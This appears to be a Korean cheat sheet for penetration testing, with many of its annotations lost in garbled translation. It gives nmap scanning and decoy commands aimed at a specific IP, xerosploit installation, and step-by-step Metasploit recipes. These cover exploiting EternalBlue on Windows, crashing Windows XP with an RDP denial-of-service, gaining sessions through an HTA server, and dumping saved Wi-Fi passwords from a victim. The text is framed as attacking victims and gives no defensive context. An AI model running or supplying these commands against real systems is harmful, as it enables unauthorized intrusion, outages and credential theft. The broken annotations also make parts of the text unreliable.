침투 테스트
nmap --sP -iL abin.txt ( abin.txt ip ,-sP )
nmap -A 120.55.226.24 ( , , )
nmap -sS 120.55.226.24 ( )
nmap -sT 120.55.226.24 ( )
nmap -sU 120.55.226.24 (udp )
nmap -D 1.1.1.1 192.168.1.102 ( 1.1.1.1)
nmap --mtu 8 192.168.1.102 ( )
nmap ip -v 10.1.2.1/24 ( 10.1.2.1 ~ 10.1.2.255 )
, nmap, xerosploit
xerosploit :
$ git clone https://github.com/LionSec/xerosploit.git
, sudo install.py:
$ sudo python install.py
빈틈 이용 도구 msf
msf 열기
msfconsole
msf /usr/share/metasploit-framework, ./msfconsole
업데이트
kali apt update,apt install metasploit-framework
------------------------------------------------------------------------------------------
1 How to exploit Windows Vista only by victim's using Kali Linux(영원의 푸른 구멍)
(smb_ms17_010) # msfconsole #msf> use auxiliary/scanner/smb/smb_ms17_010(이 모듈을 이용하여 상대방 호스트에 빈틈이 있는지 확인) #msf> set RHOSTS(remote ip) (상대방 ip 설정) #msf>run(스캔 시작) #msf>use exploit/windows/smb/ms17010_psexec (스캔에 성공하면 이 이용 모듈을 사용합니다) #msf > set RHOSTS (remote ip) (상대방 ip 설정) #msf > exploit (침투 시작)
------------------------------------------------------------------------------------------
2. How to crash windows xp(blue screen) with metasploit using kali linux(winxp 블루스크린 만드는 법)
# msfconsole
#msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids ( )
#msf> set rhost (remote ip)
#msf> exploit
------------------------------------------------------------------------------------------
3. How to exploit windows with HTA serverusing kali linux
#msfconsole
#msf> use windows/misc/hta_server/ ( )
#msf> set srvhost (local ip) ( ip, ip)
#msf> set uripath / ( )
#msf> exploit ( )
.
#msf> sessions ( , payload , )
#msf> sessions -i num ( )
------------------------------------------------------------------------------------------
5 How to get Windows Wi-Fi saved passwords using Metasploit and Kali Linux(상대방의 와이파이 비밀번호를 가져오는 방법)
: windows shell
#msf> shell
cmd> netsh wlan show profile ( wifi)
cmd> netsh wlan show profile [wifi_name] key=clear ( wifi )
------------------------------------------------------------------------------------------
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
다양한 언어의 JSONJSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.